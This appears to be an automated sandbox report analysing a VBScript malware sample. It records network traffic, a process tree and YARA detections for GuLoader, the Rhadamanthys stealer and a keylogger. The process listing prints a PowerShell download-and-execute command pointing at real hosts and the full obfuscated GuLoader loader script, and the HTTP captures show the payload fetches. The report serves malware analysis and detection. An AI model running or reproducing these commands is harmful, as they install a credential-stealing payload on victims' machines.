Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 19, 2024 12:50:48.119019985 CET | 1.1.1.1 | 192.168.2.4 | 0xda4c | No error (0) | www.astenterprises.com.pk | astenterprises.com.pk | | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 12:50:48.119019985 CET | 1.1.1.1 | 192.168.2.4 | 0xda4c | No error (0) | astenterprises.com.pk | | 107.161.23.150 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:50:50.595736027 CET | 1.1.1.1 | 192.168.2.4 | 0xbe9c | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:50:50.595736027 CET | 1.1.1.1 | 192.168.2.4 | 0xbe9c | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:50:56.213932991 CET | 1.1.1.1 | 192.168.2.4 | 0x5a3a | No error (0) | www.tdejb.com | tdejb.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 12:50:56.213932991 CET | 1.1.1.1 | 192.168.2.4 | 0x5a3a | No error (0) | tdejb.com | | 202.71.109.228 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:51:02.708759069 CET | 1.1.1.1 | 192.168.2.4 | 0xe442 | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 12:51:02.708759069 CET | 1.1.1.1 | 192.168.2.4 | 0xe442 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.58.99 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:51:02.708759069 CET | 1.1.1.1 | 192.168.2.4 | 0xe442 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.58.100 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:51:02.708759069 CET | 1.1.1.1 | 192.168.2.4 | 0xe442 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.58.98 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:51:13.722399950 CET | 1.1.1.1 | 192.168.2.4 | 0x7e7e | No error (0) | www.ftsengineers.com | ftsengineers.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 12:51:13.722399950 CET | 1.1.1.1 | 192.168.2.4 | 0x7e7e | No error (0) | ftsengineers.com | | 103.53.42.63 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:51:36.905293941 CET | 1.1.1.1 | 192.168.2.4 | 0x29a0 | No error (0) | templatesmetadata.office.net | templatesmetadata.office.net.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
• www.astenterprises.com.pk
• www.tdejb.com
• www.ftsengineers.com

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 107.161.23.150 | 443 | 7592 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-19 11:50:49 UTC | 179 | OUT | GET /lm/lm.vbs HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: www.astenterprises.com.pk
    Connection: Keep-Alive
2024-12-19 11:50:49 UTC | 392 | IN | HTTP/1.1 200 OK
    Connection: close
    content-type: text/vbscript
    last-modified: Mon, 16 Dec 2024 01:00:57 GMT
    accept-ranges: bytes
    content-length: 29579
    date: Thu, 19 Dec 2024 11:50:49 GMT
    server: LiteSpeed
    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-12-19 11:50:49 UTC | 976 | IN | Data Ascii: Private Const Kiloenes = &H2364Private Const Programdiskens = &HFFFF3C0CPrivate Const Reliances = -10676Private Const Roodle = "Nonsyncopation; flibbertigibbet."Private Const Snitsaar = "Farmerne sammensyningens"Private Const Unsupervised =
2024-12-19 11:50:49 UTC | 14994 | IN | Data Ascii: 213 = Calliperer213 & ";$Realiwor"'Bldsdenhedens, sjael drizzle!Calliperer213 = Calliperer213 & "dewo"Calliperer213 = Calliperer213 & "rds"Calliperer213 = Calliperer213 & "beha"Calliperer213 = Calliperer213 & "ndler='Clairsen"Calliperer213 = C
2024-12-19 11:50:50 UTC | 13609 | IN | Data Ascii: gerne? plamager! uncustomable fljlshandskerCalliperer213 = Calliperer213 & "seredes"Calliperer213 = Calliperer213 & ") {Sawordssword"Calliperer213 = Calliperer213 & "awordi"Calliperer213 = Calliperer213 & "swordikken (K"Calliperer213 = Callipere


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49732 | 202.71.109.228 | 443 | 7968 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-19 11:50:57 UTC | 172 | OUT | GET /kp/Reissuer.xsn HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: www.tdejb.com
    Connection: Keep-Alive
2024-12-19 11:50:58 UTC | 183 | IN | HTTP/1.1 200 OK
    Date: Thu, 19 Dec 2024 11:50:57 GMT
    Server: Apache
    Last-Modified: Fri, 13 Dec 2024 08:42:08 GMT
    Accept-Ranges: bytes
    Content-Length: 436400
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49739 | 103.53.42.63 | 443 | 7592 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-19 11:51:15 UTC | 217 | OUT | GET /lm/List%20of%20required%20items%20and%20services.doc HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: www.ftsengineers.com
    Connection: Keep-Alive
2024-12-19 11:51:18 UTC | 242 | IN | HTTP/1.1 200 OK
    Date: Thu, 19 Dec 2024 11:51:16 GMT
    Server: Apache
    Upgrade: h2,h2c
    Connection: Upgrade, close
    Last-Modified: Wed, 11 Dec 2024 15:12:05 GMT
    Accept-Ranges: bytes
    Content-Length: 29184
    Content-Type: application/msword


Session ID: 3
Source IP: 192.168.2.4
Source Port: 49754
Destination IP: 202.71.109.228
Destination Port: 443
PID: 7256
Process: C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-19 11:51:38 UTC | 167 | OUT | GET /ab/ab.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: www.tdejb.com
Cache-Control: no-cache
2024-12-19 11:51:39 UTC | 223 | IN | HTTP/1.1 200 OK
Date: Thu, 19 Dec 2024 11:51:38 GMT
Server: Apache
Last-Modified: Tue, 03 Dec 2024 03:27:16 GMT
Accept-Ranges: bytes
Content-Length: 449600
Connection: close
Content-Type: application/octet-stream



                                                                                                                                                          Target ID:0
                                                                                                                                                          Start time:06:50:43
                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                          Path:C:\Windows\System32\wscript.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\YinLHGpoX4.vbs"
                                                                                                                                                          Imagebase:0x7ff652370000
                                                                                                                                                          File size:170'496 bytes
                                                                                                                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:1
                                                                                                                                                          Start time:06:50:43
                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc'
                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:false

                                                                                                                                                          Target ID:2
                                                                                                                                                          Start time:06:50:43
                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:false

                                                                                                                                                          Target ID:3
                                                                                                                                                          Start time:06:50:48
                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                          Path:C:\Windows\System32\wscript.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\Public\k9o5xs1hnem9ja8a.vbs"
                                                                                                                                                          Imagebase:0x7ff652370000
                                                                                                                                                          File size:170'496 bytes
                                                                                                                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:4
                                                                                                                                                          Start time:06:50:51
                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:wmic diskdrive get caption,serialnumber
                                                                                                                                                          Imagebase:0x7ff6daa10000
                                                                                                                                                          File size:576'000 bytes
                                                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:5
                                                                                                                                                          Start time:06:50:51
                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:6
                                                                                                                                                          Start time:06:50:52
                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Realitetsbehandler='Clairsentient';;$opdragerfunktion='Nikau';;$Amontilladoer='Brucellosis';;$Skuldret='Picker74';;$Supercanonisation=$host.Name; function Kommaernes($Outbidder){If ($Supercanonisation) {$Nedblndedes='Medbringe';$Brions=2;$Oakling=$Brions}do{$stratigrapher+=$Outbidder[$Oakling];$Oakling+=3} until(!$Outbidder[$Oakling])$stratigrapher}function Satsstatistikken($Vridning150){ .($misscribed) ($Vridning150)}$spitefullest=Kommaernes ' yn DEbyt.h. VW';$spitefullest+=Kommaernes 'abePeBU.CDiLPii eeD.n,vt';$gedeskindene=Kommaernes ',nMJ oP zU iA lCllCoa ./';$Amatren=Kommaernes ' aTTrl isIn1 C2';$Oaklingnddragelses='Sr[ FN.neChtDe. Bs DeSyR.vVArIKncUneNuP toE iBaNB.T,uMReA UnC APhgE EPrRn ]Bo:A : Hs oeFocGlUherM i Tt,yT P,krA,OSlT koo c rO FLGa= i$ Ca mGra DT MR rEM N';$gedeskindene+=Kommaernes 'A 5,e.Ov0 F(C WH,ibenOpdGlo w sS, GdNS TCh S 1Kw0py. R0Es;fu ReWByiD nFa6F,4Fl;O VaxSk6 w4Ou;Ot or ovS : .1S 3Fn1Sy.F 0gr)Pu FGBreDecP kBioly/Fa2 C0Cu1Be0Mo0Ko1Fe0Bl1 , FeF oi,er Ie afBkoA xCh/Bi1 i3Se1.a.Be0';$Enkemnds=Kommaernes ',uUStS eE ,Rac-BoaStg FE ,NTat';$Multilobulate=Kommaernes 'Knh,utCotS p CsCi: / /Glw.sw,owd .F tA,d.eeH jWab B.stcMeoAamFr/ nk ipox/ReRA eTai asEusFou,ne arPr. Gxn.s An B> ahPit BtHup sD :Mo/Ex/ w,ywT,wTa.Urf DtM sShe snSog,oi lnCeeK,e.yrM.sin.LacSko MmSk/djkFam D/TaROmeP.i sB s eu HePur O. 
,xSus un';$Tunneling=Kommaernes 'Fo>';$misscribed=Kommaernes 'K,i xeGlx';$Allieres24='dalsnkning';$Medicates='\Dyrehospitalerne.Gra';Satsstatistikken (Kommaernes ' f$IsGDrl o eB uA.aLFa:Tre .VdeaInS TiOpoImNLeeA.rInS c=Re$EyEF.N NVT,:.aaGapUnp AdSlA ft A ,+ o$ mbee DSti Ic ha KTKoEGys');Satsstatistikken (Kommaernes 'In$.igKoLVaOOvbUnASwlOr: riInNStuJanMaCNiTHou VoblU SsSa= M$SlmbeU PlGlt Pi RLIlOLoblruM,l aaFot ZEAr.UdsFlPCrL Fi lt A(Ja$c,TImUBoNA,nK,ENel eIExNIngO,)');Satsstatistikken (Kommaernes $Oaklingnddragelses);$Multilobulate=$Inunctuous[0];$Pressurized=(Kommaernes 'Ci$TiGPolIsOTibU.ADrLf :Fod OeFofP rB O Tc k =S NS,eGiwMu-CyoWhBRyJ eArC Otdy AfSSvySpS HT GeOvm K. B$ResLePUnISyTBoE KF euFrlFaL eWis ,t');Satsstatistikken ($Pressurized);Satsstatistikken (Kommaernes 'De$Swd eUnfPar FoF c.rkH,. rHUle IaNad aePrrS,sDg[Tr$.aEF nTrkSue Sm TnMud sUn]S,=Fo$L gSte.edKve s UkSci anTadMae lnSee');$Stoikerne=Kommaernes 'S,$sod LeDyfI rNeo .ccakFa.VaDBroPaw anFrlLaoFoa TdC F ri,olBieDo(C $DaMtuu Kl Lt Oi Ol AoO b Iu ml naUotBieEr,.a$ ,H vnoi,xr,iv,ue plSubD,e fvSng HeEnlS sEneIlr,esPh)';$Hvirvelbevgelsers=$Evasioners;Satsstatistikken (Kommaernes ' o$ vGalLAnoN.b faGaL B: Sh uuAnsBaeE,RkoERadBre eSPr= F(UdTF.e ,SReTSi-DiP AviTG HSk Pr$ nhHiVwaIPrr.oVDeE,jL B CESivNogfoeFlLSvsJoe,crSpSSk)');while (!$huseredes) {Satsstatistikken (Kommaernes 'Uk$ jgAklpeoLabOdaI lEv:YaH LaA,lHusEkh uMagFygSke A=te$ReMU.iA,sDyt dnRek Pt') ;Satsstatistikken $Stoikerne;Satsstatistikken (Kommaernes 'Des .TMaaDrrSkt s- RS,yl SEBeE DpTj S,4');Satsstatistikken (Kommaernes ' $ lGSiLHao GbViA Sl C: hFaU VsO E .r .ER,DDreMiSPe= n(RaT PEH SNet U-BepGaaAaTI hSp U$HoH.kVScI ,r.avKrePalUdB EGuV rGCaEPulCaSF E hRInSBe)') ;Satsstatistikken (Kommaernes 'Pi$R,gMeLAfOLgB Ba el .:SeP i ,p MI bnByGFlSAr= p$NoG olSpoEib jaReL A:DibPeAL N GD Fb FuW LF,lTvef RVinGyeNoSOv+ l+D %I $SkI oN.uuSoN c et UuW oFlUKrSBl.frC.ooCiU NStT') 
;$Multilobulate=$Inunctuous[$Pipings]}$Affixal=297744;$Unattributive=29554;Satsstatistikken (Kommaernes ' E$skGSaL .oRuBH A,iL ,:s H rYStLFreunrTenHaeFlsHe Ca=C PeG eLatFa-E,CC,oP N At NeS N Jtad j,$.eHFuV ,i HR V.ee BlN B SETivP GR EL LGisJaESpR is');Satsstatistikken (Kommaernes 'U,$ Fg,nlafoAnb,oaAflsk:,aT reAbiP.nIntSl Sa=B M,[SySH yPesVet TeLomRu.HaC soSkn ,v ,e hr StIm]U :Ge:epF trFoo hmSpB .a TsFoeCo6 e4M S BtBorOriSunO,gPo(S $.iHU,y FlSteF ra nSaeNisOp)');Satsstatistikken (Kommaernes 'Lu$ igbolThOn,BNyAChlMo:GuC .UE,a TrPrtKre Tr ,OUnn . Ru=Pr .b[ GSOuyPlS TmieO M e. TCoE,eXInT U. ,e TnHac TOM d BiBonlog K]B :Pr:S a Ms crai ,i,r.TrG EEB.tG.SdutSkrMiiPan og C(Un$BuTSaEh,I.enB tAd)');Satsstatistikken (Kommaernes 'Pu$ eG MLCaoPuBiras,LRv:LiUPaNShDSaeStVZee oLreOBepLgaAaBbiLI eBa=Ok$ aCF U Na HRDoTBeENoRStOD nRe..osA uAsBL,s RtSnr iBlnNogSp( a$V AS.FHefH I.aXAeaglLBo,An$scUsoNHaaCnTHuTH REcifobT u Mt aiNaVOsENy)');Satsstatistikken $Undevelopable;"
                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.1989249528.000001D2A3A26000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:7
                                                                                                                                                          Start time:06:50:52
                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:11
                                                                                                                                                          Start time:06:51:05
                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" <same script argument as Target ID 6>
                                                                                                                                                          Imagebase:0xd70000
                                                                                                                                                          File size:433'152 bytes
                                                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000B.00000002.2214210925.0000000008970000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000B.00000002.2214810117.000000000B9FD000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000B.00000002.2187855204.0000000005C3C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:12
                                                                                                                                                          Start time:06:51:05
                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:13
                                                                                                                                                          Start time:06:51:17
                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Public\pqg5u7vt.doc" /o ""
                                                                                                                                                          Imagebase:0x250000
                                                                                                                                                          File size:1'620'872 bytes
                                                                                                                                                          MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:false

                                                                                                                                                          Target ID:15
                                                                                                                                                          Start time:06:51:19
                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                          Imagebase:0x7ff6eef20000
                                                                                                                                                          File size:55'320 bytes
                                                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:false

                                                                                                                                                          Target ID:19
                                                                                                                                                          Start time:06:51:26
                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                                                                          Imagebase:0x6a0000
File size:59'904 bytes
MD5 hash:9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000013.00000003.2319358464.00000000027C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000013.00000003.2325408969.0000000022DE0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000013.00000003.2326506772.0000000023000000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000013.00000003.2340047272.00000000227E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:true

Target ID:20
Start time:06:51:43
Start date:19/12/2024
Path:C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\svchost.exe"
Imagebase:0xfa0000
File size:46'504 bytes
MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000014.00000003.2328880762.0000000000B10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000014.00000003.2336659742.0000000004D20000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000014.00000003.2336254784.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
Has exited:false

                                                                                                                                                            • Opcode Fuzzy Hash: a3355e1764b8d46c7018d58912839028992f771c611c28e1c5e558a538246d8d
                                                                                                                                                            • Instruction Fuzzy Hash: 68515932B1E7891FEB65EA584CA56A8B7D1FF62310F1801BED05CC71D3DE286D058782
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.1998920250.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 698a30417b64df08ab4b131753c2ead987643d9867d10d26a0a523afad91b9da
                                                                                                                                                            • Instruction ID: 6dd2d312ffc647659ab3de0116d61083755a49e8171c9ee5f68d19709e7b049d
                                                                                                                                                            • Opcode Fuzzy Hash: 698a30417b64df08ab4b131753c2ead987643d9867d10d26a0a523afad91b9da
                                                                                                                                                            • Instruction Fuzzy Hash: ED416B22B1EA891FE765DAAC48B52A877D1FF52750F2801FED06CC71E3DE186C058382
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.1998920250.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 42f6d0cbf24317295401f09326107f2677a7eb13d8e213b71b87bc2e8adf9228
                                                                                                                                                            • Instruction ID: f54bf920ed86253e499944128f31108ae0aba28ed89ec3f841ace870f4ff3621
                                                                                                                                                            • Opcode Fuzzy Hash: 42f6d0cbf24317295401f09326107f2677a7eb13d8e213b71b87bc2e8adf9228
                                                                                                                                                            • Instruction Fuzzy Hash: CA313712F2FACE5BEBF5976818B627867C1EF00751B6A01FAD45CCB1F2EE086C004241
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.1998920250.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 4b833df29b9d71aaa7951bca7259edfc32e364f8743c2526bf3ebcad4984a593
                                                                                                                                                            • Instruction ID: 33f588a0e3a21e060937910c2d41d9ca5adbd516db61645a924b96ecbc8df8a8
                                                                                                                                                            • Opcode Fuzzy Hash: 4b833df29b9d71aaa7951bca7259edfc32e364f8743c2526bf3ebcad4984a593
                                                                                                                                                            • Instruction Fuzzy Hash: 07210922F2FA4E5BE7B9966C18B537C67C2EF81650B5901BED05CC72E3EE19BC015201
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.1998273422.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffd9b8a0000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: e6ac59b578cec2c427730387da2c3b5852c97882512bf2c521fdba1d489bb730
                                                                                                                                                            • Instruction ID: 6647219333622f606d6c8291ec0e411cda163065b12aaa4f020c4df055735159
                                                                                                                                                            • Opcode Fuzzy Hash: e6ac59b578cec2c427730387da2c3b5852c97882512bf2c521fdba1d489bb730
                                                                                                                                                            • Instruction Fuzzy Hash: 0B315230A1964ECEFBB4AF54CC6AFF932D4FF49318F410139D45D860A2DA396A85CB61
                                                                                                                                                            Memory Dump Source
